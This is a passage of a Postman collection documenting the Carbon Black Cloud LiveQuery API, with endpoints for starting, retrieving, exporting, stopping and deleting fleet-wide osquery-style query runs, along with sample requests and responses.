page</a>.</p>\n","_postman_id":"3dc97563-054c-4c55-8309-894e2bddbe22","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"LiveQuery REST API 🗝","item":[{"name":"Live Query Run","item":[{"name":"Start Query Run","id":"c6cd2ccc-eab3-4a09-ad67-894a1e8b5450","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"notify_on_finish\": false,\n    \"name\": \"Autoexecs\",\n    \"device_filter\": {\n        \"os\": [\n            \"LINUX\",\n            \"MAC\",\n            \"WINDOWS\"\n        ]\n    },\n    \"sql\": \"SELECT name, path, source FROM autoexec;\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs","description":"<p>Initiate a new LiveQuery search.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#start-query-run\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"235d2ed9-ffc6-4371-8cc7-93002ffd3597","name":"Autoexecs","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"notify_on_finish\": false,\n    \"name\": \"Autoexecs\",\n    \"device_filter\": {\n        \"os\": [\n            \"LINUX\",\n            \"MAC\",\n            \"WINDOWS\"\n        ]\n    },\n    \"sql\": \"SELECT name, path, source FROM autoexec;\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"54cb1e74-07e2-44ed-9271-22c388feff96","name":"Bitlocker Status","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"notify_on_finish\": false,\n    \"name\": \"Bitlocker Status\",\n    \"device_filter\": {\n        \"os\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"sql\": \"SELECT drive_letter, CASE protection_status WHEN 0 THEN \\\"OFF\\\" WHEN 1 THEN \\\"ON (Unlocked)\\\" WHEN 2 THEN \\\"ON (Locked)\\\" END \\\"Bitlocker Status\\\" FROM bitlocker_info;\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 24 May 2021 23:04:03 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1026"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Server","value":"nginx/1.17.10"},{"key":"Set-Cookie","value":"JSESSIONID=79DF0D25D9F403644E21DA9F2072A509; Path=/appservices; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Request-Createtime","value":"1621897443233"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"7desj9gn\",\n    \"name\": \"Bitlocker Status\",\n    \"id\": \"em2hewgryfy8sggjy5jcbuvss9ehinac\",\n    \"sql\": \"SELECT drive_letter, CASE protection_status WHEN 0 THEN \\\"OFF\\\" WHEN 1 THEN \\\"ON (Unlocked)\\\" WHEN 2 THEN \\\"ON (Locked)\\\" END \\\"Bitlocker Status\\\" FROM bitlocker_info;\",\n    \"created_by\": \"YPR5RZ4H2B\",\n    \"destinations\": [\n        \"LQ\"\n    ],\n    \"create_time\": \"2021-05-24T23:04:03.233Z\",\n    \"status_update_time\": \"2021-05-24T23:04:03.233Z\",\n    \"timeout_time\": \"2021-05-31T23:04:03.233Z\",\n    \"cancellation_time\": null,\n    \"cancelled_by\": null,\n    \"archive_time\": null,\n    \"archived_by\": null,\n    \"notify_on_finish\": false,\n    \"active_org_devices\": 49,\n    \"status\": \"ACTIVE\",\n    \"device_filter\": {\n        \"policy_id\": null,\n        \"os\": [\n            \"WINDOWS\"\n        ],\n        \"device_id\": null,\n        \"deployment_type\": null,\n        \"policy_ids\": null,\n        \"device_types\": [\n            \"WINDOWS\"\n        ],\n        \"device_ids\": null\n    },\n    \"recommended_query_id\": null,\n    \"template_id\": null,\n    \"schedule\": null,\n    \"schema\": null,\n    \"last_result_time\": null,\n    \"total_results\": 0,\n    \"not_started_count\": 49,\n    \"match_count\": 0,\n    \"no_match_count\": 0,\n    \"success_count\": 0,\n    \"in_progress_count\": 0,\n    \"error_count\": 0,\n    \"not_supported_count\": 0,\n    \"cancelled_count\": 0\n}"}],"_postman_id":"c6cd2ccc-eab3-4a09-ad67-894a1e8b5450"},{"name":"Get Query Details","id":"62a0e549-fcbc-4425-939a-f6eee526db5e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}","description":"<p>Returns the current details of a Live Query run. Users will be able to observe numerous metadata fields, such as status within the JSON response.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-query-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"62a0e549-fcbc-4425-939a-f6eee526db5e"},{"name":"Get Query Run Results","id":"52a6018c-6357-4227-b623-5161dae09728","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_search?format=csv&download=true","description":"<p>Gets results from a Live Query run. The Live Query results can also be exported as a CSV compressed in a ZIP, or exported asynchronously (see below for details).</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><strong>Request</strong></p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search\n</code></pre><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search?format=csv\n</code></pre><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search?format=csv&amp;download=true\n</code></pre><p><strong>Note:</strong> The last two routes will stream or download results to a <code>CSV</code>. See Additional Query Parameter Values below for additional information about using the stream or download <code>CSV</code> functionality.</p>\n<h3 id=\"export-large-jobs-asynchronously\">Export Large Jobs Asynchronously</h3>\n<p><em>(See Examples in the upper right of Postman)</em></p>\n<p>You can use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a> (<strong>Platform APIs</strong>) to download large sets of query results without experiencing timeout errors or receiving corrupt files.</p>\n<p>This route can take an optional URL query parameter that tells the server to process the request asynchronously.</p>\n<p>When downloading very large sets of query results as CSV, make sure you pass <code>“?format=csv&amp;async=true”</code> as a query parameter to the existing <code>/results/_search</code> route or you may receive errors and corrupt files.</p>\n<p>You can only request <code>format=csv</code> when using <code>async=true</code>. - <code>?format=zip&amp;async=true</code> is not supported</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-query-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_search"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>CSV or ZIP</p>\n","type":"text/plain"},"key":"format","value":"csv"},{"description":{"content":"<p>Cannot pass <code>async</code> AND <code>download</code></p>\n","type":"text/plain"},"key":"download","value":"true"},{"disabled":true,"description":{"content":"<p>Cannot pass <code>download</code> AND <code>async</code></p>\n","type":"text/plain"},"key":"async","value":"true"}],"variable":[]}},"response":[{"id":"511cc086-5095-4235-ad4a-83186d4f4c8f","name":"Export Large Jobs Asynchronously","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device.id\": [\n            \"<integer>\",\n            \"<integer>\"\n        ],\n        \"device.name\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"device.os\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"device.policy_id\": [\n            \"<integer>\"\n        ],\n        \"device.policy_name\": [\n            \"<string>\",\n            \"<string>\"\n        ],\n        \"status\": [\n            \"<string>\",\n            \"<string>\"\n        ]\n    },\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        },\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<integer>\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_search?format=csv&async=true","host":["{{cb_url}}"],"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_search"],"query":[{"key":"format","value":"csv","description":"CSV or ZIP"},{"key":"download","value":"true","description":"Cannot pass `async` AND `download`","disabled":true},{"key":"async","value":"true","description":"Cannot pass `download` AND `async`"}]}},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"4674b48f-7e7e-40ee-b8a4-d15e1d6c48a9","name":"Stream CSV File","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"text/csv","description":"To use the stream functionality, set the Accept: text/csv header for the correct response to return."}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device.id\": [ <integer>\n        ],\n        \"device.name\": [\n            \"<string>\"\n        ],\n        \"device.os\": [\n            \"<string>\"\n        ],\n        \"device.policy_id\": [ <integer>\n        ],\n        \"device.policy_name\": [\n            \"<string>\"\n        ],\n        \"status\": [\n            \"<string>\"\n        ],\n        \"time_received\": {\n            \"all_time\": <boolean>,\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        }\n    },\n    \"query\": \"<string>\",\n    \"rows\": <integer>,\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": <integer>\n}"},"url":{"raw":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_search?format=csv","host":["{{cb_url}}"],"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_search"],"query":[{"key":"format","value":"csv","description":"CSV or ZIP"},{"key":"async","value":"true","description":"Cannot pass `download` AND `async`","disabled":true}]}},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":null},{"id":"1ecd4c80-5aad-4cec-931d-b0429b262925","name":"Download CSV File","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/octet-stream","description":"To retrieve the export as a zipped CSV file, set the Accept: application/octet-stream header and include download=true in the query parameters."}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device.id\": [ <integer>\n        ],\n        \"device.name\": [\n            \"<string>\"\n        ],\n        \"device.os\": [\n            \"<string>\"\n        ],\n        \"device.policy_id\": [ <integer>\n        ],\n        \"device.policy_name\": [\n            \"<string>\"\n        ],\n        \"status\": [\n            \"<string>\"\n        ],\n        \"time_received\": {\n            \"all_time\": <boolean>,\n            \"end\": \"<string>\",\n            \"range\": \"<string>\",\n            \"start\": \"<string>\"\n        }\n    },\n    \"query\": \"<string>\",\n    \"rows\": <integer>,\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": <integer>\n}"},"url":{"raw":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_search?format=csv&download=true","host":["{{cb_url}}"],"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_search"],"query":[{"key":"format","value":"csv","description":"CSV or ZIP"},{"key":"download","value":"true","description":"Cannot pass `async` AND `download`"},{"key":"async","value":"true","description":"Cannot pass `download` AND `async`","disabled":true}]}},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":null},{"id":"f5a5cd17-9f38-4abc-b65f-2ec0415d7259","name":"Get Query Run Results","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device.id\": [\n            11412673\n        ]\n    },\n    \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_search","host":["{{cb_url}}"],"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_search"],"query":[{"key":"format","value":"csv","description":"CSV or ZIP","disabled":true},{"key":"download","value":"true","description":"Cannot pass `async` AND `download`","disabled":true},{"key":"async","value":"true","description":"Cannot pass `download` AND `async`","disabled":true}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"ABCD1234\",\n    \"num_found\": 45,\n    \"results\": [\n        {\n            \"id\": \"bxnrsex8dkzq7fw28rmdzhng6mzhczei\",\n            \"device\": {\n                \"id\": 11412673,\n                \"name\": \"test-machine\",\n                \"policy_id\": 7113786,\n                \"policy_name\": \"Standard\",\n                \"os\": \"WINDOWS\"\n            },\n            \"status\": \"matched\",\n            \"time_received\": \"2022-11-28T13:45:51.379Z\",\n            \"device_message\": \"\",\n            \"fields\": {\n                \"name\": \"Privacy Badger\",\n                \"path\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\6jmaljui.default-release\\\\extensions\\\\jid1-MnnxcxisBPnSXQ@jetpack.xpi\",\n                \"version\": \"2021.11.23.1\"\n            }\n        }\n    ]\n}"}],"_postman_id":"52a6018c-6357-4227-b623-5161dae09728"},{"name":"Scroll All Run Results","id":"381c4bac-3f57-4fd3-a42d-4e7a3f69bc10","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"device.id\": [<integer>],\n    \"device.name\": [\"<string>\"],\n    \"device.os\": [\"<string>\"],\n    \"device.policy_id\": [<integer>],\n    \"device.policy_name\": [\"<string>\"],\n    \"run_id\": [\"<string>\"],\n    \"status\": [\"<string>\"],\n    \"time_received\": {\n      \"end\": \"<string>\",\n      \"range\": \"<string>\",\n      \"start\": \"<string>\"\n    }\n  },\n  \"query\": \"<string>\",\n  \"rows\": <integer>,\n  \"search_after\": \"<string>\"\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/results/_scroll","description":"<p>Gets results from a Live Query run. The Live Query results can also be exported as a CSV compressed in a ZIP, or exported asynchronously (see below for details).</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><strong>Request</strong></p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search\n</code></pre><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search?format=csv\n</code></pre><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>POST &lt;psc-hostname&gt;/livequery/v1/orgs/{org_key}/runs/{id}/results/_search?format=csv&amp;download=true\n</code></pre><p><strong>Note:</strong> The last two routes will stream or download results to a <code>CSV</code>. See Additional Query Parameter Values below for additional information about using the stream or download <code>CSV</code> functionality.</p>\n<h3 id=\"export-large-jobs-asynchronously\">Export Large Jobs Asynchronously</h3>\n<p><em>(See Examples in the upper right of Postman)</em></p>\n<p>You can use the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a> (<strong>Platform APIs</strong>) to download large sets of query results without experiencing timeout errors or receiving corrupt files.</p>\n<p>This route can take an optional URL query parameter that tells the server to process the request asynchronously.</p>\n<p>When downloading very large sets of query results as CSV, make sure you pass <code>“?format=csv&amp;async=true”</code> as a query parameter to the existing <code>/results/_search</code> route or you may receive errors and corrupt files.</p>\n<p>You can only request <code>format=csv</code> when using <code>async=true</code>. - <code>?format=zip&amp;async=true</code> is not supported</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-query-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","results","_scroll"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Cannot pass <code>download</code> AND <code>async</code></p>\n","type":"text/plain"},"key":"async","value":"true"}],"variable":[]}},"response":[{"id":"60cc959c-c33f-40c9-9a0b-d8c1ef9686b8","name":"Scroll All Run Results","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"device.id\": [ 11412673 ],\n    \"time_received\": {\n        \"range\": \"-3h\"\n    }\n  },\n  \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/results/_scroll"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n  \"org_key\": \"ABCD1234\",\n  \"num_found\": 45,\n  \"num_remaining\": 44,\n  \"search_after\": \"MTY5OTQ0OTQ2MDY1NywxODU2MzkwMSwyaGtiY3F4cjl3dG1sZmlienloYzBmcmludW44Y2I1MCwxMTY7MTY5OTM4OTkxMzAwMCwxNjk5NDc2MzEzMDAwOzEzMTU=\",\n  \"results\": [\n    {\n      \"id\": \"bxnrsex8dkzq7fw28rmdzhng6mzhczei\",\n      \"device\": {\n        \"id\": 11412673,\n        \"name\": \"test-machine\",\n        \"policy_id\": 7113786,\n        \"policy_name\": \"Standard\",\n        \"os\": \"WINDOWS\"\n      },\n      \"status\": \"matched\",\n      \"time_received\": \"2023-11-07T21:33:14.482Z\",\n      \"device_message\": \"\",\n      \"fields\": {\n        \"name\": \"Privacy Badger\",\n        \"path\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\6jmaljui.default-release\\\\extensions\\\\jid1-MnnxcxisBPnSXQ@jetpack.xpi\",\n        \"version\": \"2021.11.23.1\"\n      }\n    }\n  ]\n}"}],"_postman_id":"381c4bac-3f57-4fd3-a42d-4e7a3f69bc10"},{"name":"Get Live Query Recommendations","id":"3cfa2c6e-347b-43d8-9db2-ca3a93b26c71","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/recommendations","description":"<p>Get TauTin Live Query Recommendations.  </p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-live-query-recommendations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","recommendations"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"34c1f2f3-0523-473d-942c-9066f7f385ee","name":"Get Live Query Recommendations","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/recommendations"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"ABCD1234\",\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"link\": null,\n            \"queries\": {\n                \"description\": \"The Authorized_keys file for SSH is a critical file that controls which users can log into which systems.\",\n                \"interval\": 86400,\n                \"query\": {\n                    \"c5df11f1dfaec0fbf0aad23e\": \"SELECT *\\nFROM users\\nJOIN authorized_keys USING (UID);\"\n                },\n                \"results\": \"Lists all relevant information about the authorized keys on the target systems.\",\n                \"supported_platforms\": [\n                    \"linux\",\n                    \"mac\"\n                ],\n                \"title\": \"Authorized SSH Keys\"\n            },\n            \"type\": \"compliance\"\n        }\n    ]\n}"}],"_postman_id":"3cfa2c6e-347b-43d8-9db2-ca3a93b26c71"},{"name":"Stop Query Run","id":"cebf31ad-27ce-4d90-90a0-0a872eff497f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"status\": \"CANCELLED\"\n}"},"url":"{{cb_url}}/livequery/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/status","description":"<p>Stop a LiveQuery Run that is running.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#stop-query-run\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","status"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"cebf31ad-27ce-4d90-90a0-0a872eff497f"},{"name":"Delete Query Run","id":"af245888-881e-415f-8eb5-0fb7445ae4db","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}","description":"<p>Delete a LiveQuery Run.</p>\n<p><strong>RBAC Permissions Required</strong></p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#delete-query-run\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"af245888-881e-415f-8eb5-0fb7445ae4db"},{"name":"Get Facets From Live Query Results","id":"7fc3b398-126d-458f-aac2-24ab2443483a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"additionalProp1\": [\n      \"string\"\n    ],\n    \"additionalProp2\": [\n      \"string\"\n    ],\n    \"additionalProp3\": [\n      \"string\"\n    ]\n  },\n  \"query\": \"string\",\n  \"terms\": {\n    \"fields\": [\n      \"string\"\n    ],\n    \"rows\": 0\n  }\n}"},"url":"{{cb_url}}/livequery/v1/orgs/{{cb_org_key}}/runs/{{cb_query_id}}/results/_facet","description":"<p>Retrieves facets for Live Query results.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>livequery.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-liveops/latest/livequery-api/#get-facets-from-live-query-results\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","id":"deb3567a-c2c1-49e6-8a28-4656356ec2a3","name":"LiveQuery REST API 🗝","type":"folder"}},"urlObject":{"path":["livequery","v1","orgs","{{cb_org_key}}","runs","{{cb_query_id}}","results","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"5a99f847-cdbc-40e8-8cbc-a2eaddaaa3cc","name":"Get Facets From Live Query Results","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": 